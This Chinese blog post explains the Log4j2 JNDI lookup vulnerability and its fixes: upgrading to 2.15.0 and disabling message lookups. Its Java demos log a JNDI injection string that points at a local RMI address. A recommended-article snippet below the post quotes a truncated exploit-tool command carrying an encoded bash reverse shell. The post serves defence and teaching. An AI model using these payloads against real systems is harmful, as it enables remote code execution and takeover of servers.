记录一下log4j2漏洞解决方法

最新推荐文章于 2024-05-06 22:39:28 发布
最新推荐文章于 2024-05-06 22:39:28 发布
阅读量8.2k 收藏 7
点赞数 4
分类专栏: 问题解决记录 文章标签: java 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wwh_a123/article/details/121896261
版权

影响的版本范围:Apache Log4j 2.x <= 2.14.1

当发现网上爆出log4j2出现漏洞时,自己也做了测试,确实是非常严重的问题。同时,测试了slf4j包,未出现类似的漏洞

import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

private static final Logger logger = LoggerFactory.getLogger(Test.class);//slf4j

一、解决方法:
升级log4j2包的版本,升级到2.15.0

用到 Log4j2 的话请尽快升级版本

二、来不及更新版本修复,可通过下面的方法紧急缓解问题:

1.修改jvm参数 -Dlog4j2.formatMsgNoLookups=true
2.修改配置:log4j2.formatMsgNoLookups=True
3.将系统环境变量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置为 true

三、漏洞
1. log4j官网lookups
https://logging.apache.org/log4j/2.x/manual/lookups.html
比如:
在这里插入图片描述

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Test {
	private static final Logger logger = LogManager.getLogger(Test.class);//log4j 
	
    public static void main(String[] args) {
        //参数
        //String user = "{name:张三,age:14}";

        //带有$符号的参数
//        String user = "${java:vm}";
//        String user = "${java:version}";
//        String user = "${java:runtime}";
//        String user = "${java:os}";
//        String user = "${java:oracle}";
        String user = "${java:hw}";

        logger.info("user:{}",user);
    }
}

2.通过JNDI注入漏洞,黑客可以恶意构造特殊数据请求包,触发此漏洞

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Test {
	private static final Logger logger = LogManager.getLogger(Test.class);//log4j 
	
    public static void main(String[] args) {
        //jndi
    	String user = "${jndi:rmi://127.0.0.1:1099/example}";

        logger.info("user:{}",user);
    }
}
wwh_a123
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
log4j2漏洞检测工具
05-07
为了解决这个问题,专门的Log4j2漏洞检测工具应运而生。 **Log4j2漏洞概述** Log4j2是Apache软件基金会的一个项目,它提供了一个灵活且高性能的日志记录API。然而,在2021年12月初,研究人员发现Log4j2的一个严重...
log4j2漏洞复现以及解决方案
学习不止境的博客
08-10 4411
log4j2漏洞解决 rmi远程调用 jndi注入 lookup
Web网络安全-----Log4j高危漏洞原理及修复
qq_51690690的博客
07-27 1万+
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。
2024年网络安全最全【紧急】Apache Log4j任意代码执行漏洞安全风险升级修复教程,网络安全教程
最新发布
2401_84263282的博客
05-06 1012
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
log4j漏洞分析及总结
热门推荐
csd_ct的专栏
02-14 4万+
2021年12月8号爆出的log4j2的远程代码执行漏洞【cve-2021-44228】,堪称史诗级核弹漏洞,虽然过了这么久,大部分现网中的相关漏洞已经修复,但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘,年前年后比较忙,一直没有好好的分析总结该漏洞,最近学习下刚好补上。 漏洞描述及影响 log4j是Apache的一个开源项目,是一个基于Java的日志记录框架。Log4j2是log4j的后继者,被大量用于业务系统开发记录日志信息。很多互联网公司以及耳熟能详的公司的系统都在使用该框架。
log4j漏洞详解
weixin_61638307的博客
03-21 3895
JNDI(Java Naming and Directory Interface,Java命名和目录接口)是SUN公司提供的一种标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,举个例子:它就相当于的你的一个秘书,用了一些手段,你可以去指使他去干一些事情,这个手段就是lookup(),相当于你给秘书一个目标。先给这些名词简单说一下Ldap:你可以将它理解为一个目标数据库。
Log4j漏洞补救 Log4j2 + SLF4j 升级到最新版本
zhaofuqiangmycomm的博客
01-26 1万+
原创:Log4j2 + SLF4j打造日志系统 - 云+社区 - 腾讯云 2019-01-15阅读2.3K0 目录 一:前言 二:添加依赖 2.1:去除直接和间接依赖的log4j1和SLF4j 2.2:添加依赖 三:xml配置 3.1:log4j2.xml常用demo 3.2:demo的优点 3.3:内容详解 3.4:demo变形 3.4.1:同步打印日志 3.4.2:全部异步打印日志 3.4.3:混合模式打印日志 四:其他 4.1:Log日.
JAVA安全--log4j漏洞研究分析
goddemon
03-12 9911
log4j漏洞复现 复现 这里以bugku上的靶场为例进行复现 https://ctf.bugku.com/challenges/detail/id/340.html 环境配置 ①ldap服务 服务器起一个ldap服务就好了 直接执行反弹shell 即直接配置bash反弹shell命令 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84Mi4xNTYuM
log4j log4j2 2.15.0漏洞解决
12-10
《深入解析Log4j与Log4j2 2.15.0漏洞解决方案》 在信息技术领域,日志记录是系统监控、故障排查和安全分析的重要环节。Log4j和Log4j2作为Java平台广泛使用的日志框架,其性能高效、功能强大,深受开发者喜爱。...
log4j2漏洞终极解决方法 apache-log4j-2.16.0-bin.zip
12-14
总的来说,Apache Log4j2漏洞解决需要综合考虑升级、配置修改和安全监控等多个方面。对于开发者和运维人员来说,理解漏洞的原理并采取有效的应对措施至关重要,以防止潜在的攻击并保护系统的安全性。通过及时修复...
Apache Log4j2 远程代码执行漏洞检测工具
12-15
使用这些检测工具,用户可以快速定位并解决Log4j2漏洞,防止恶意攻击者利用该漏洞对系统进行控制。重要的是,不仅要运行这些工具,还应结合其他安全措施,例如更新到最新的Log4j2补丁版本,审查和加固日志配置,以及...
log4j2.17.2
04-14
此次,我们聚焦于“log4j2.17.2漏洞修复程序包”,深入探讨该版本如何解决这一安全隐患。 Log4j2漏洞(CVE-2021-44228)的本质在于,攻击者可以通过操纵日志输入,触发JNDI(Java Naming and Directory Interface)...
【紧急】Apache Log4j任意代码执行漏洞安全风险升级修复教程
Tom弹架构
12-12 5210
背景 近期一个 Apache Log4j 远程代码执行漏洞细节被公开,攻击者利用漏洞可以远程执行代码。经过分析,该组件存在Java JNDI注入漏洞,当程序将用户输入的数据进行日志,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。 Apache Log4j2 是一款优秀的 Java 日志框架。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。由于 Apache Log4j2
速度 快速临时解决Log4j惊天漏洞
qq_53058639的博客
02-12 194
此次 Apache Log4j2 漏洞触发条件为只要外部用户输入的数据会被日志记录,即可造成远程代码执行。
log4j2漏洞源码分析
weixin_45682070的博客
12-14 3567
前言: 上篇分析了jndi+ldap的利用,这两天新爆出来的漏洞log4j2中,结合恶意payload可执行远程恶意代码 影响范围:Apache Log4j 2.x < 2.15.0-rc2,而且利用难度低,利用要求少 紧急缓解措施(最好升级最新版本): (1) 修改jvm参数 -Dlog4j2.formatMsgNoLookups=true (2) 修改配置log4j2.formatMsgNoLookups=True (3) 将系统环境变量 FORMAT_MESSAGES_PATTERN_DISAB
log4j漏洞复现
weixin_45740473的博客
12-23 8816
12 月 10 日凌晨,Apache 开源项目 Log4j 的远程代码执行漏洞细节被公开,由于 Log4j 的广泛使用,该漏洞一旦被攻击者利用会造成严重危害。 Apache Log4j 2.x <= 2.14.1 版本均回会受到影响。 一、lookup 功能造成的漏洞 Log4j 是一款开源 Java 日志记录工具。Log4j 2 是对 Log4j 的重大升级,此次漏洞的出现,正是由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 549
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
log4j漏洞原理和靶场复现
Aiwin的博客
08-19 7806
log4j漏洞原理和靶场复现
SpringBoot日常:集成slf4j2日志配置
qq_32590535的博客
07-27 716
本章节主要介绍springboot项目集成slf4j2,看完本章内容可以轻松完成集成。另外说一下,在对日志输出场景比较多的情况下可以考虑将logback更换为log4j2
apache log4j2漏洞
01-13
Apache Log4j2是一个流行的Java日志框架,用于记录应用程序的日志信息。然而,最近发现了一个严重的漏洞,被称为Apache Log4j2远程代码执行漏洞。该漏洞允许攻击者通过精心构造的日志消息触发远程代码执行,从而完全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值